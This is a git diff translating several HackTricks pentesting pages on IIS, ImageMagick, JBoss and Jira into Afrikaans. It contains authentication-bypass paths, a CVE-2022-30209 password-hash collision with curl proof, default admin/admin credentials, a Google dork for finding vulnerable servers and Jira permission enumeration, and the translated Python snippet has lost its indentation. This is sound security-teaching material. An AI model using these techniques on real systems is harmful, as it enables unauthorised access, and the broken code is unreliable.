-You can use [https://github.com/irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner) to test for this vulnerability:`java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/`
+Jy kan [https://github.com/irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner) gebruik om vir hierdie kwesbaarheid te toets:`java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/`
 
 ![](<../../.gitbook/assets/image (183).png>)
 
-Original research: [https://soroush.secproject.com/downloadable/microsoft\_iis\_tilde\_character\_vulnerability\_feature.pdf](https://soroush.secproject.com/downloadable/microsoft\_iis\_tilde\_character\_vulnerability\_feature.pdf)
+Oorspronklike navorsing: [https://soroush.secproject.com/downloadable/microsoft\_iis\_tilde\_character\_vulnerability\_feature.pdf](https://soroush.secproject.com/downloadable/microsoft\_iis\_tilde\_character\_vulnerability\_feature.pdf)
 
-You can also use **metasploit**: `use scanner/http/iis_shortname_scanner`
+Jy kan ook **metasploit** gebruik: `use scanner/http/iis_shortname_scanner`
 
-### Basic Authentication bypass
+### Basiese Verifikasie omseil
 
-**Bypass** a basic authentication (**IIS 7.5**) trying to access: `/admin:$i30:$INDEX_ALLOCATION/admin.php` or `/admin::$INDEX_ALLOCATION/admin.php`
+**Omseil** 'n basiese verifikasie (**IIS 7.5**) deur te probeer om toegang te verkry tot: `/admin:$i30:$INDEX_ALLOCATION/admin.php` of `/admin::$INDEX_ALLOCATION/admin.php`
 
-You can try to **mix** this **vulnerability** and the last one to find new **folders** and **bypass** the authentication.
+Jy kan probeer om hierdie **kwesbaarheid** en die vorige een te **kombineer** om nuwe **vouers** te vind en die verifikasie te **omseil**.
 
-## ASP.NET Trace.AXD enabled debugging
+## ASP.NET Trace.AXD geaktiveerde foutopsporing
 
-ASP.NET include a debugging mode and its file is called `trace.axd`.
+ASP.NET sluit 'n foutopsporingsmodus in en sy lêer word `trace.axd` genoem.
 
-It keeps a very detailed log of all requests made to an application over a period of time.
+Dit hou 'n baie gedetailleerde logboek van alle versoek wat oor 'n tydperk na 'n toepassing gestuur word.
 
-This information includes remote client IP's, session IDs, all request and response cookies, physical paths, source code information, and potentially even usernames and passwords.
+Hierdie inligting sluit in die IP-adresse van afgeleë kliënte, sessie-ID's, alle versoek- en antwoordkoekies, fisiese paaie, bronkode-inligting, en moontlik selfs gebruikersname en wagwoorde.
 
 [https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/](https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/)
 
 ![Screenshot 2021-03-30 at 13 19 11](https://user-images.githubusercontent.com/31736688/112974448-2690b000-915b-11eb-896c-f41c27c44286.png)
 
-## ASPXAUTH Cookie
+## ASPXAUTH-koekie
 
-ASPXAUTH uses the following info:
+ASPXAUTH gebruik die volgende inligting:
 
-* **`validationKey`** (string): hex-encoded key to use for signature validation.
-* **`decryptionMethod`** (string): (default “AES”).
-* **`decryptionIV`** (string): hex-encoded initialization vector (defaults to a vector of zeros).
-* **`decryptionKey`** (string): hex-encoded key to use for decryption.
+* **`validationKey`** (string): heksgekodeerde sleutel wat gebruik word vir handtekeningvalidering.
+* **`decryptionMethod`** (string): (verstek "AES").
+* **`decryptionIV`** (string): heksgekodeerde inisialisasievektor (verstek is 'n vektor van nulle).
+* **`decryptionKey`** (string): heksgekodeerde sleutel wat gebruik word vir dekripsie.
 
-However, some people will use the **default values** of these parameters and will use as **cookie the email of the user**. Therefore, if you can find a web using the **same platform** that is using the ASPXAUTH cookie and you **create a user with the email of the user you want to impersonate** on the server under attack, you may be able to us**e the cookie from the second server in the first one** and impersonate the user.\
-This attacked worked in this [**writeup**](https://infosecwriteups.com/how-i-hacked-facebook-part-two-ffab96d57b19).
+Sommige mense sal egter die **verstekwaardes** van hierdie parameters gebruik en die **e-pos van die gebruiker** as **koekie** gebruik. Daarom, as jy 'n webwerf kan vind wat dieselfde platform gebruik en die ASPXAUTH-koekie gebruik, en jy **'n gebruiker met die e-pos van die gebruiker wat jy wil voorstel** op die aangevalle bediener skep, kan jy dalk die koekie van die tweede bediener in die eerste een gebruik en die gebruiker voorstel.\
+Hierdie aanval het gewerk in hierdie [**verslag**](https://infosecwriteups.com/how-i-hacked-facebook-part-two-ffab96d57b19).
 
-## IIS Authentication Bypass with cached passwords (CVE-2022-30209) 
-
-[Full report here](https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html): A bug in the code **didn't properly check for the password given by the user**, so an attacker whose **password hash hits a key** that is already in the **cache** will be able to login as that user .
+## IIS-verifikasie-omseiling met gestoorde wagwoorde (CVE-2022-30209) 
 
+[Volledige verslag hier](https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html): 'n Fout in die kode het **nie behoorlik vir die wagwoord wat deur die gebruiker gegee is nie**, so 'n aanvaller wie se wagwoordhash 'n sleutel tref wat reeds in die **kas** is, sal in staat wees om as daardie gebruiker aan te meld.
 ```python
 # script for sanity check
 > type test.py
 def HashString(password):
-    j = 0    
-    for c in map(ord, password):
-        j = c + (101*j)&0xffffffff
-    return j
+j = 0
+for c in map(ord, password):
+j = c + (101*j)&0xffffffff
+return j
 
 assert HashString('test-for-CVE-2022-30209-auth-bypass') == HashString('ZeeiJT')
 
@@ -284,17 +301,16 @@ HTTP/1.1 401 Unauthorized
 > curl -I -su 'orange:ZeeiJT' 'http:///protected/' | findstr HTTP
 HTTP/1.1 200 OK
 ```
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

diff --git a/network-services-pentesting/pentesting-web/imagemagick-security.md b/network-services-pentesting/pentesting-web/imagemagick-security.md
index 784f6d72a..6b04ed4cf 100644
--- a/network-services-pentesting/pentesting-web/imagemagick-security.md
+++ b/network-services-pentesting/pentesting-web/imagemagick-security.md
@@ -1,69 +1,65 @@
-# ImageMagick Security
+# ImageMagick Sekuriteit
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
 
 

 
-Check further details in [**https://blog.doyensec.com/2023/01/10/imagemagick-security-policy-evaluator.html**](https://blog.doyensec.com/2023/01/10/imagemagick-security-policy-evaluator.html)
+Kyk na verdere besonderhede in [**https://blog.doyensec.com/2023/01/10/imagemagick-security-policy-evaluator.html**](https://blog.doyensec.com/2023/01/10/imagemagick-security-policy-evaluator.html)
 
-ImageMagick, a versatile image processing library, presents a challenge in configuring its security policy due to its extensive options and lack of detailed online documentation. Users often create policies based on fragmented internet sources, leading to potential misconfigurations. The library supports a vast array of over 100 image formats, each contributing to its complexity and vulnerability profile, as demonstrated by historical security incidents.
+ImageMagick, 'n veelsydige beeldverwerking-biblioteek, bied 'n uitdaging in die konfigurasie van sy sekuriteitsbeleid as gevolg van sy uitgebreide opsies en 'n gebrek aan gedetailleerde aanlyn dokumentasie. Gebruikers skep dikwels beleide gebaseer op gefragmenteerde internetbronne, wat moontlike verkeerde konfigurasies tot gevolg het. Die biblioteek ondersteun 'n wye verskeidenheid van meer as 100 beeldformate, wat elk bydra tot sy kompleksiteit en kwesbaarheidsprofiel, soos gedemonstreer deur historiese sekuriteitsvoorvalle.
 
-## Towards Safer Policies
-To address these challenges, a [tool has been developed](https://imagemagick-secevaluator.doyensec.com/) to aid in designing and auditing ImageMagick's security policies. This tool is rooted in extensive research and aims to ensure policies are not only robust but also free from loopholes that could be exploited.
-
-## Allowlist vs Denylist Approach
-Historically, ImageMagick policies relied on a denylist approach, where specific coders were denied access. However, changes in ImageMagick 6.9.7-7 shifted this paradigm, enabling an allowlist approach. This approach first denies all coders and then selectively grants access to trusted ones, enhancing the security posture.
+## Na Veiliger Beleide
+Om hierdie uitdagings aan te spreek, is 'n [hulpmiddel ontwikkel](https://imagemagick-secevaluator.doyensec.com/) om te help met die ontwerp en ouditering van ImageMagick se sekuriteitsbeleide. Hierdie hulpmiddel is gegrond op uitgebreide navorsing en streef daarna om te verseker dat beleide nie net robuust is nie, maar ook vry van leemtes wat uitgebuit kan word.
 
+## Allowlist vs Denylist-benadering
+Histories het ImageMagick-beleide staatgemaak op 'n denylist-benadering, waar spesifieke koders toegang ontken is. Tog het veranderinge in ImageMagick 6.9.7-7 hierdie paradigma verskuif deur 'n allowlist-benadering moontlik te maak. Hierdie benadering ontken aanvanklik alle koders en verleen dan selektief toegang aan vertroude koders, wat die sekuriteitsposisie versterk.
 ```xml
-  ...
-  
-  
-  ...
+...
+
+
+...
 ```
+## Gevalgevoeligheid in Beleide
+Dit is van kritieke belang om te let op die gevalgevoeligheid van beleidspatrone in ImageMagick. Dit is noodsaaklik om te verseker dat kodeerders en modules korrek in hoofletters geskryf word in beleide om onbedoelde toestemmings te voorkom.
 
-## Case Sensitivity in Policies
-It's crucial to note that policy patterns in ImageMagick are case sensitive. As such, ensuring that coders and modules are correctly upper-cased in policies is vital to prevent unintended permissions.
-
-## Resource Limits
-ImageMagick is prone to denial of service attacks if not properly configured. Setting explicit resource limits in the policy is essential to prevent such vulnerabilities.
-
-## Policy Fragmentation
-Policies may be fragmented across different ImageMagick installations, leading to potential conflicts or overrides. It's recommended to locate and verify the active policy files using commands like:
+## Hulpbronlimiete
+ImageMagick is vatbaar vir 'n diensweieringsaanval as dit nie behoorlik gekonfigureer word nie. Dit is noodsaaklik om eksplisiete hulpbronlimiete in die beleid in te stel om sulke kwesbaarhede te voorkom.
 
+## Beleidsfragmentasie
+Beleide kan oor verskillende ImageMagick-installasies gefragmenteer word, wat moontlike konflikte of oorskrywings kan veroorsaak. Dit word aanbeveel om die aktiewe beleidslêers op te spoor en te verifieer deur gebruik te maak van opdragte soos:
 ```shell
 $ find / -iname policy.xml
 ```
+## 'n Aanvangsbeperkende Beleid
+'n Beperkende beleidstempel is voorgestel, wat fokus op streng hulpbronbeperkings en toegangsbeheer. Hierdie tempel dien as 'n basislyn vir die ontwikkeling van op maat gemaakte beleide wat in lyn is met spesifieke aansoekvereistes.
 
-## A Starter, Restrictive Policy
-A restrictive policy template has been proposed, focusing on stringent resource limitations and access controls. This template serves as a baseline for developing tailored policies that align with specific application requirements.
+Die doeltreffendheid van 'n sekuriteitsbeleid kan bevestig word deur die `identify -list policy` opdrag in ImageMagick te gebruik. Daarbenewens kan die [evaluator tool](https://imagemagick-secevaluator.doyensec.com/) wat vroeër genoem is, gebruik word om die beleid te verfyn op grond van individuele behoeftes.
 
-The effectiveness of a security policy can be confirmed using the `identify -list policy` command in ImageMagick. Additionally, the [evaluator tool](https://imagemagick-secevaluator.doyensec.com/) mentioned earlier can be used to refine the policy based on individual needs.
-
-## References
+## Verwysings
 * [https://blog.doyensec.com/2023/01/10/imagemagick-security-policy-evaluator.html**](https://blog.doyensec.com/2023/01/10/imagemagick-security-policy-evaluator.html)
 
 
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

diff --git a/network-services-pentesting/pentesting-web/jboss.md b/network-services-pentesting/pentesting-web/jboss.md
index 25bea33df..9aed0021e 100644
--- a/network-services-pentesting/pentesting-web/jboss.md
+++ b/network-services-pentesting/pentesting-web/jboss.md
@@ -2,57 +2,57 @@
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

 
 
 
-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
+As jy belangstel in 'n **hackingsloopbaan** en die onhackbare wil hack - **ons is aan die werf!** (_vlot Pools skriftelik en mondeling vereis_).
 
 {% embed url="https://www.stmcyber.com/careers" %}
 
-## Enumeration and Exploitation Techniques
+## Opname- en Uitbuitingstegnieke
 
-When assessing the security of web applications, certain paths like _/web-console/ServerInfo.jsp_ and _/status?full=true_ are key for revealing **server details**. For JBoss servers, paths such as _/admin-console_, _/jmx-console_, _/management_, and _/web-console_ can be crucial. These paths might allow access to **management servlets** with default credentials often set to **admin/admin**. This access facilitates interaction with MBeans through specific servlets:
+Wanneer die veiligheid van webtoepassings geassesseer word, is sekere roetes soos _/web-console/ServerInfo.jsp_ en _/status?full=true_ sleutel tot die onthulling van **bedienerbesonderhede**. Vir JBoss-bedieners kan roetes soos _/admin-console_, _/jmx-console_, _/management_, en _/web-console_ van kritieke belang wees. Hierdie roetes mag toegang tot **bestuurservlets** met versteklegitimasie wat dikwels op **admin/admin** ingestel is, moontlik maak. Hierdie toegang fasiliteer interaksie met MBeans deur spesifieke servlets:
 
-- For JBoss versions 6 and 7, **/web-console/Invoker** is used.
-- In JBoss 5 and earlier versions, **/invoker/JMXInvokerServlet** and **/invoker/EJBInvokerServlet** are available.
+- Vir JBoss-weergawes 6 en 7 word **/web-console/Invoker** gebruik.
+- In JBoss 5 en vroeëre weergawes is **/invoker/JMXInvokerServlet** en **/invoker/EJBInvokerServlet** beskikbaar.
 
-Tools like **clusterd**, available at [https://github.com/hatRiot/clusterd](https://github.com/hatRiot/clusterd), and the Metasploit module `auxiliary/scanner/http/jboss_vulnscan` can be used for enumeration and potential exploitation of vulnerabilities in JBOSS services.
+Hulpmiddels soos **clusterd**, beskikbaar by [https://github.com/hatRiot/clusterd](https://github.com/hatRiot/clusterd), en die Metasploit-module `auxiliary/scanner/http/jboss_vulnscan` kan gebruik word vir opname en potensiële uitbuiting van kwesbaarhede in JBOSS-diens.
 
-### Exploitation Resources
+### Uitbuitingshulpbronne
 
-To exploit vulnerabilities, resources such as [JexBoss](https://github.com/joaomatosf/jexboss) provide valuable tools.
+Om kwesbaarhede uit te buit, bied hulpbronne soos [JexBoss](https://github.com/joaomatosf/jexboss) waardevolle gereedskap.
 
-### Finding Vulnerable Targets
+### Identifisering van Kwesbare Doelwitte
 
-Google Dorking can aid in identifying vulnerable servers with a query like: `inurl:status EJInvokerServlet`
+Google Dorking kan help om kwesbare bedieners te identifiseer met 'n soektog soos: `inurl:status EJInvokerServlet`
 
 
 
-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
+As jy belangstel in 'n **hackingsloopbaan** en die onhackbare wil hack - **ons is aan die werf!** (_vlot Pools skriftelik en mondeling vereis_).
 
 {% embed url="https://www.stmcyber.com/careers" %}
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

diff --git a/network-services-pentesting/pentesting-web/jira.md b/network-services-pentesting/pentesting-web/jira.md
index a08a2012e..f191f1a27 100644
--- a/network-services-pentesting/pentesting-web/jira.md
+++ b/network-services-pentesting/pentesting-web/jira.md
@@ -1,25 +1,23 @@
-
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
 
 

 
 
-## Check Privileges
+## Kontroleer Voorregte
 
-In Jira, **privileges can be checked** by any user, authenticated or not, through the endpoints `/rest/api/2/mypermissions` or `/rest/api/3/mypermissions`. These endpoints reveal the user's current privileges. A notable concern arises when **non-authenticated users hold privileges**, indicating a **security vulnerability** that could potentially be eligible for a **bounty**. Similarly, **unexpected privileges for authenticated users** also highlight a **vulnerability**.
+In Jira kan **voorregte gekontroleer word** deur enige gebruiker, geïdentifiseer of nie, deur die eindpunte `/rest/api/2/mypermissions` of `/rest/api/3/mypermissions`. Hierdie eindpunte onthul die gebruiker se huidige voorregte. 'n Belangrike bekommernis ontstaan wanneer **nie-geïdentifiseerde gebruikers voorregte het**, wat dui op 'n **sekuriteitskwesbaarheid** wat moontlik in aanmerking kan kom vir 'n **beloning**. Soortgelyk dui **onverwagte voorregte vir geïdentifiseerde gebruikers** ook op 'n **kwesbaarheid**.
 
-An important **update** was made on **1st February 2019**, requiring the 'mypermissions' endpoint to include a **'permission' parameter**. This requirement aims to **enhance security** by specifying the privileges being queried: [check it here](https://developer.atlassian.com/cloud/jira/platform/change-notice-get-my-permissions-requires-permissions-query-parameter/#change-notice---get-my-permissions-resource-will-require-a-permissions-query-parameter)
+'n Belangrike **opdatering** is op **1 Februarie 2019** gemaak, wat vereis dat die 'mypermissions' eindpunt 'n **'permission'-parameter** insluit. Hierdie vereiste is bedoel om die sekuriteit te **verbeter** deur die voorregte wat ondervra word, te spesifiseer: [kyk dit hier](https://developer.atlassian.com/cloud/jira/platform/change-notice-get-my-permissions-requires-permissions-query-parameter/#change-notice---get-my-permissions-resource-will-require-a-permissions-query-parameter)
 
 - ADD_COMMENTS
 - ADMINISTER
@@ -63,15 +61,12 @@ An important **update** was made on **1st February 2019**, requiring the 'myperm
 - VIEW_VOTERS_AND_WATCHERS
 - WORK_ON_ISSUES
 
-Example: `https://your-domain.atlassian.net/rest/api/2/mypermissions?permissions=BROWSE_PROJECTS,CREATE_ISSUES,ADMINISTER_PROJECTS`
-
-
+Voorbeeld: `https://jou-domein.atlassian.net/rest/api/2/mypermissions?permissions=BROWSE_PROJECTS,CREATE_ISSUES,ADMINISTER_PROJECTS`
 ```bash
 #Check non-authenticated privileges
 curl https://jira.some.example.com/rest/api/2/mypermissions | jq | grep -iB6 '"havePermission": true'
 ```
-
-## Automated enumeration
+## Outomatiese opname
 
 * [https://github.com/0x48piraj/Jiraffe](https://github.com/0x48piraj/Jiraffe)
 * [https://github.com/bcoles/jira\_scan](https://github.com/bcoles/jira\_scan)
@@ -79,16 +74,14 @@ curl https://jira.some.example.com/rest/api/2/mypermissions | jq | grep -iB6 '"h
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

-
-
diff --git a/network-services-pentesting/pentesting-web/joomla.md b/network-services-pentesting/pentesting-web/joomla.md
